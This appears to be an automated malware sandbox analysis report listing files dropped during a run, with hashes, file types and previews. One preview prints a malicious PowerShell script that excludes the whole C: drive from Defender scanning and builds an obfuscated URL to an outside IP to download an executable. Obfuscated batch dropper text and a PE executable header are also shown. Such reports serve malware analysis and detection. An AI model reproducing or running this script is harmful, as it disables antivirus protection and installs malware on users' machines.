                                                                                                                                                                                                                                                  SHA-512:4EB061931CC1BA9D0BB3E5D75939D531610800C36B0CBD20CF7FCDFFFC672817ED2592A8AF34A89C5DA60AC36EE054ABF361DF701AEC016C62E255102B72637B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/950EF434EFE3896EA55A414B6EADF2BE",.. "id": "950EF434EFE3896EA55A414B6EADF2BE",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/950EF434EFE3896EA55A414B6EADF2BE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4DAEC0A7E81DA2CE2CEA08C9A8399714",.. "id": "4DAEC0A7E81DA2CE2CEA08C9A8399714",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4DAEC0A7E81DA2CE2CEA08C9A8399714"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19253
                                                                                                                                                                                                                                                  Entropy (8bit):5.005753878328145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                                                                                                                                                                  MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                                                                                                                                                                  SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                                                                                                                                                                  SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                                                                                                                                                                  SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                                                                                                                                                                  MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                                                                                                                                                                  SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                                                                                                                                                                  SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                                                                                                                                                                  SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:@...e................................................@..........

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\11808.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1770
                                                                                                                                                                                                                                                  Entropy (8bit):5.549316294049586
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:prNtSSYERj255ScY5fIWRFQFvm57ySRKEwQXRuxZ/L0Y:1XO55W0V27mxJ
                                                                                                                                                                                                                                                  MD5:C6CD519425B9834AC8BD685288383101
                                                                                                                                                                                                                                                  SHA1:47DF09DA69492421F0EBE527C0C2BD18E37CC703
                                                                                                                                                                                                                                                  SHA-256:CE33B6577AF8130D7E2C272E1E6E80E8424E1FEF3DFD83A3C46297B32B133CA5
                                                                                                                                                                                                                                                  SHA-512:90B7DCC5903B538C8D28E995B2EE19D2C32DF549D6DBED673E3BDB8256323A1B893199F022F5189495A50158A3DF0B641B4F7FB9BA60F94DC7A5F6B1B6846E52
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:# .......... . ...........$alias = "IEX".$cmd = 'Add-MpPreference -ExclusionPath "C:\"'..# .......... ........& $alias $cmd..# ........ 10 .......Start-Sleep -Seconds 10..# .......... . ................ ........$z1 = "h"; $m2 = "t"; $l3 = "t"; $f4 = "p"; $x5 = ":"; .$j6 = "/"; $a7 = "/"; $s8 = "1"; $n9 = "3"; $t0 = "8"; $g7 = ".";.$g1 = "1"; $q2 = "2"; $h3 = "4"; $u4 = "."; $b5 = "6"; .$v6 = "0"; $o7 = "."; $p8 = "1"; $y9 = "3"; $cw0 = "3"; .$eg1 = "/"; $i2 = "l"; $k3 = "e"; $w4 = "m"; $r5 = "."; .$y6 = "e"; $c7 = "x"; $e8 = "e";..# ......... URL . ...............$europe = ($z1 + $m2 + $l3 + $f4 + $x5 + $j6 + $a7 + $s8 + $n9 + $t0 + $g7 + $g1 + $q2 + $h3 + $u4 + $b5 + $v6 + $o7 + $p8 + $y9 + $cw0 + $eg1 + $i2 + $k3 + $w4 + $r5 + $y6 + $c7 + $e8);..# .... ... .......... ..... . ................ ....... ...........$dirPath =

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\628056\Corrections.com

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\628056\u

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):369373
                                                                                                                                                                                                                                                  Entropy (8bit):7.999479085447109
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:6144:FJQdJwo8s+9cpRF3C9Wa84DAX33LxQ7rB1Wkstu7pKLwmmdW2kaVXF2HPHKr2GH:FJQsANZ4cX37xqds2QcmAKaVXF2vqr2G
                                                                                                                                                                                                                                                  MD5:E805CD0F799D0AD76BDB49FAEF798D13
                                                                                                                                                                                                                                                  SHA1:41C8D79A6727403BBBB9B0E8D98887A3A7A8D8CB
                                                                                                                                                                                                                                                  SHA-256:B1F7C0ED244E054DD5EAE5FF022131ED9727543A4D0CDB6235C2D3723D2C4835
                                                                                                                                                                                                                                                  SHA-512:77A7560377610E97A103EE51E1945ACE4673F80D6F57A2475E613729474C9EB047C7088650EDB20FAA3862C67E274074E1DCEDB3646BFB4E5A91AC9E77EF6139
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Admission

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):93184
                                                                                                                                                                                                                                                  Entropy (8bit):6.160455964027194
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:AFfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0U:AFfTut/Dde6u640ewy4Za9coRC2jfTqH
                                                                                                                                                                                                                                                  MD5:7E00B549662A27E8F4A9DC5F950FD8E7
                                                                                                                                                                                                                                                  SHA1:ECBC302511819C0AF9BF7B990AA3623873AE2A2A
                                                                                                                                                                                                                                                  SHA-256:811039F826716917239C503F5797ABA4B57880E700B102F8C202DF9CA4C2AC37
                                                                                                                                                                                                                                                  SHA-512:C110B335341F09FF06E8AD0558E495356EE83452BE570BA60417859A2F371876D9F760E265F2146E42E328402336B96324DFE2B79CA494A5A77D926A169C72A1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......j.;.u.3.SSSSj...3.SSSSj.V....I._^3.[]...U..SVW.}...W.o...3..CS........>y*...Q..|2...L2.t..I8..A..|2...D2.t..@8.@...u....V....&..^..;.G..H..0...........@u.S....Au.j..L.....P.1.. .I............_^3.[]...U..SV.u.WV.......3..CS.........yM...Q..|:...L:.t..I8..A..|:...D:.t..@8.@...!.F..p.....\........j..v.......u..u.......&..^._^3.[]...U..SV.u.W...N..I..Y....F..H..N......V.]..(...j....|......By*...I..|9...T9.t..R8..B..|9...D9.t..@8.@...u.........&..F......G......j.0V..\.I.........r...t.3.Pj.V..@.I.....Pj.V..@.I.j..u.j.V....I._^3.[]...U..V.u........Q.E..E.....P...H.......j.............<......@..L0..|0..^t..I8Q.M....3.]...U..V.u....w...Q.E..E.....P...H....S...j...................@..L0..|0..^t..I8Q.M..+...3.]...U..V.u........Q.E..E.....P...H........j..................@..L0..|0..^t..I8Q.M.....3.]...U..V.u.......Q.E..E.....P...H.......j.............(......@..L0..|0..^t..I8Q.M..s...3.]...SVWj....j.......0y*...y..|7...L7.t..I8..A..|7...D7.t..@8.@.....+..4.I.......3.B..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Appeals

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):75776
                                                                                                                                                                                                                                                  Entropy (8bit):4.144986056310104
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:BKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3z:BKaj6iTcPAsAhxjgarB/5el3z
                                                                                                                                                                                                                                                  MD5:7E6A03C749F54958AB60313137E6610E
                                                                                                                                                                                                                                                  SHA1:9F62D8F217558154E2DB9C970C1257C8E16DB6BD
                                                                                                                                                                                                                                                  SHA-256:CC3F1B74CF6DD7C88D42F5B29E089F1937613F8BB6E2274A94E7461B55795FF0
                                                                                                                                                                                                                                                  SHA-512:E555FA28C97E3618C6AC5903F735AC6919D69528F8A53E5DC0B3B546451A92C7797BC3945E60FCEE1A6550DB5C3E315C91DAE8FF94B1C0E1873EBB86AD38D085
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:........................................................................r.......................................................................................................................................................r.r.r.r.r.....................................................................................r...................................................................................r.............................................................................................................................................................................................................................................................................................................................r.r.....................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Breakfast

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):97280
                                                                                                                                                                                                                                                  Entropy (8bit):6.5722629420970895
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:in+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bU:i+AqVnBypIbv18mLthfhnueoMmOqDoig
                                                                                                                                                                                                                                                  MD5:84B74DA383C7061D1F67A002DD8C47F7
                                                                                                                                                                                                                                                  SHA1:DC909E77B77059D86FD7FA99471F93029DD66A2F
                                                                                                                                                                                                                                                  SHA-256:1C9B9CC68B82CFC34B542CFDB143A9EAA6F63EC17065DF8608EAE27F8A667579
                                                                                                                                                                                                                                                  SHA-512:C09F0665456327859DC89C93C5D55289AFDF9657A226304D4871ED4C02DC26B8DDB7747941F136FD854C5A754E37299EB808288F80ABDF75CE1B0BF83AC82DE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:J..2S....P......P.....u......1...>3._.F.....^[....U..V.u....W.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cheats

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16713
                                                                                                                                                                                                                                                  Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                  MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                  SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                  SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                  SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cheats.cmd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16713
                                                                                                                                                                                                                                                  Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                  MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                  SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                  SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                  SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Colonial

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):90112
                                                                                                                                                                                                                                                  Entropy (8bit):6.825606182838265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:YYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOEg:fWy4ZNoGmROL7F1G7ho2kOF
                                                                                                                                                                                                                                                  MD5:02B5952F3F0B3EF33C6AD0EE50BA13D3
                                                                                                                                                                                                                                                  SHA1:0F7F1A5C9AD674098B380962EDDFB8E2499C28CF
                                                                                                                                                                                                                                                  SHA-256:E17E9751D3E04A043DE086B4B26AE59A1DCF8B6C838FCC42B0CD2B47B807774C
                                                                                                                                                                                                                                                  SHA-512:1226748B8810BCE5665C43A0E8CF3F6585ED2A2A9B4DC93B9FE1BB301898CFA120C0FBDF96CA8B5E3C31960521836E87A7326F2AA4A374666D5A3B53277A048F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .c.o.n.s.t.a.n.t...5.C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .p.a.r.a.m.e.t.e.r. .i.n.s.i.d.e. .a. .u.s.e.r. .f.u.n.c.t.i.o.n.........I.n.v.a.l.i.d. .f.i.l.e. .f.i.l.t.e.r. .g.i.v.e.n...*.E.x.p.e.c.t.e.d. .a. .v.a.r.i.a.b.l.e. .i.n. .u.s.e.r. .f.u.n.c.t.i.o.n. .c.a.l.l...1.".D.o.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t...2.".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Contractor

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                  Entropy (8bit):7.996798534009921
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:OmBqjLBskqmgCub7WmH9DT1enI0Va/FJ2GkX5DMamIWSxEz:OmojLeN37ZH9f1eDAdo4tSK
                                                                                                                                                                                                                                                  MD5:3D3482F49381B6FD0830558DEC464625
                                                                                                                                                                                                                                                  SHA1:705C9181F55B2F4276D3689F8BED0EC25489877E
                                                                                                                                                                                                                                                  SHA-256:476B64C0A243B52CB8B4BEBA0634E77CD176FD1D15C8D8E08DB41B67585E7C1C
                                                                                                                                                                                                                                                  SHA-512:5777023FD4AF5D1A1DCF784E477D29B2B445BB73572D3D31208C4E5986A015FFA1D09AB65A709775723772FFF705F25F983BA228A72062F49D82964D18F9002B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..\.]...;p.A.,...l.4.I..96....."2q[e.p..ML.D..0.E.!.G.....1....-t+.~....8...E. w.....\.......q.R..+];D....#q..../m....[i..9....@..../..f.G.@.{.j..E./.n.B...n.&......%'Op....E#......$.bu&a.D....&&.17j.'}..ZG.~.@)...T."..*.....Z..._.j.cK...v[s.~...`!D)...x.,_..-..K:$LQ.e.A.....V.,2-%.V.H}I.?....?.....#..p.\%..TT...B.a..x.iM....{.....&8 .B.......s~...y\..:...?_......#/......,.Y.a.....$...3.4.X..I....(..3..B/wn.X.]..`bvD..4.l......S...1.,_.........:]n...?...PQL.X.NU.m.....u.V.D.".,....N.........'.N.R.....K..B.d......A.u..:2.d.....7.....w9.*...HN../&.#`.}.D.....;d.M..r'........%Z..-..[....Q..#.q.M...GS4`.4.......h.Z.....zl.$......_....P.........e.QdJD....|N..(.........ZbC./.L.Z.as8.A16.........*.....C`...6...^V.z!.a(s.BBa."... .;..x_.n.i.P...B.=...b.`....lU].;...HGkHvQ....H.k.zX.7.).7.K.ev.{..2..W..ob.]7...K...L..fc.%..a..s.;.U...9n'.o 4.R.=..N}..=|..gZ.4....::......3.....sf.$q..^k.2.N+..z........n...U...c.\vn.vrf...e..Yu><...zwk....=v.@D_~P.kC...e.V"3

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Dick

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):134144
                                                                                                                                                                                                                                                  Entropy (8bit):6.674977789477399
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:1BRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:DNPj0nEo3tb2j6AUkB0CThp6A
                                                                                                                                                                                                                                                  MD5:8FEC4166BA86F7AC86DA9F06ABE49557
                                                                                                                                                                                                                                                  SHA1:5927648717AD20DBC2B9C1EB30CB5CF990182128
                                                                                                                                                                                                                                                  SHA-256:446CF37FD6B4C78C054185EC6D54823A0FDD3282FCA99B958B29E23CB4B075A0
                                                                                                                                                                                                                                                  SHA-512:A9812F1D24434ECABFC9F9781C29BED83B56619E544A21F018C454565A0EBA447B0B66B3F78ABE42BF227CC1F0E6959576328EA9F6A2776771CE7E5CD2F1E7C4
                                                                                                                                                                                                                                                  Malicious:false
